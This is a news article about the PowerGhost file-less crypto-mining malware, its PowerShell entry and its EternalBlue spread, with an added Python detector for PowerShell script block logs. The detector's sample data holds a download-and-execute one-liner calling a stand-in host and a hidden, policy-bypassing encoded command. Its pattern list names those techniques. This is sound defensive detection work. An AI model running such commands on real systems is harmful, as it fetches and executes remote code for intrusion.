A new malware, aptly named PowerGhost, has been detected, and it has some unique characteristics that leave the owners of the targeted systems clueless about when the attack was mounted and how long it stayed on their network.
The key findings about PowerGhost so far are that its primary aim appears to be running cryptocurrency mining processes on the targeted systems, with the digital coins mined being credited automatically to the wallets of the malware's operators.
The second finding is that whoever is controlling PowerGhost seems to be attacking large companies.
Some Worrying Tendencies
The PowerGhost malware and all details attached to it have been brought to light by a technical team at Kaspersky Lab, the renowned cybersecurity firm.
What they have described in a detailed blog post could send worrying signals to many network administrators in large corporate bodies and other organizations that use hundreds of systems in their networks.
Firstly, this new malware does not use any files to infect the system. Though not an entirely new phenomenon, file-less malware poses a serious challenge to cybersecurity experts and users of the targeted systems alike.
A PowerShell script is apparently the tool the attacker uses to gain entry into the system, and because the script is never written to the hard disk, the user is unable to detect the malware.
What is worse, in the next step, PowerGhost is able to quickly spread to the other systems within the connected network.
Here, it has been found to be using the EternalBlue exploit. This lets the remote attacker run cryptocurrency mining on multiple systems at once, thereby earning more from the cryptocurrency mined.
In such a setup, several systems may be sitting idle, so the extra processing power PowerGhost consumes has every chance of going unnoticed.
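The claim that nothing is written to disk deserves a defender's caveat: PowerShell script block logging records the text of every script block as it executes, whether or not it ever touched the file system, so file-less activity still leaves a trail. The following added Python example (not from the original article and not Kaspersky Lab's code) triages constructed records modelled on those script block events, decoding any -EncodedCommand payload before matching; the host names, URLs and event records are constructed, and the indicator list is this example's own assumption, not an exhaustive rule set.

```python
import base64
import re

# Heuristic indicators of in-memory ("file-less") PowerShell execution; the
# encoded_command pattern captures the base64 payload so it can be decoded.
ENCODED = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)
INDICATORS = [
    ("encoded_command", ENCODED),
    ("in_memory_exec", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("remote_fetch", re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I)),
]

# Constructed sample records modelled on PowerShell script block logging
# (Event ID 4104 in the PowerShell operational log); not real captures.
SAMPLE_EVENTS = [
    {"host": "ws-01", "script": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"host": "srv-07", "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"},
    {"host": "srv-07", "script": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand SQBFAFgA"},
    {"host": "ws-02", "script": "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\r.csv"},
]

def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_script_block(script):
    """Sorted indicator names that fire; a decoded payload is scanned as well."""
    texts = [script]
    decoded = decode_encoded_command(script)
    if decoded:
        texts.append(decoded)
    return sorted(name for name, rx in INDICATORS if any(rx.search(t) for t in texts))

def triage(events, threshold=2):
    """(host, indicators) for script block records with at least `threshold` hits."""
    flagged = []
    for ev in events:
        hits = score_script_block(ev["script"])
        if len(hits) >= threshold:
            flagged.append((ev["host"], hits))
    return flagged
```

The threshold keeps a lone Invoke-WebRequest from a scheduled report download below the alert line, while a hidden-window, policy-bypassing encoded command is flagged even though the raw record never contains the string "IEX".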
Crypto Mining Malware Has Overtaken Ransomware
Over the past year or more, cybersecurity experts have indeed observed a rise in attacks by hackers around the world who mine cryptocurrency on their victims' systems. Crypto mining attacks now outnumber ransomware attacks, which dominated earlier.
The reasons are not difficult to find. Mining cryptocurrency on a blockchain draws a disproportionate amount of power, and one has to invest in more powerful machines to get the process done faster.
The cost of power in many countries is very high. Deploying malware such as PowerGhost therefore gives these criminals a double benefit.
They save the expense at their end and wind up earning more digital currency than they could have using their own computers.
Kaspersky Lab has reported that the hackers using PowerGhost have targeted specific geographies, including Turkey, Brazil, India and Colombia.
PowerGhost Can Be Used for Other Attacks as Well
PowerGhost is not used by hackers for crypto mining attacks only. Distributed denial of service (DDoS) attacks have also been reported and traced back to PowerGhost.
In those attacks, however, there is evidence of files being written to the hard disk. Experts nonetheless expect the technique to be refined so that a file-less variant of the attack emerges as well.
Researchers point out that besides PowerGhost, the Hide N Seek malware exhibited similar properties.
The hallmark of these malware programs is that they operate undetected, which gives them the time to stay put in the targeted system, causing more damage than one might imagine and making money without placing any ransom demand.
The computer user community will have to work closely with cybersecurity specialists to ensure that anti-malware programs are developed and installed on their systems to pre-empt such attacks.
Seemingly innocuous malware can end up causing excessive damage to your systems and computer network, and the cost of restoring the systems to their original protected status could be extremely high.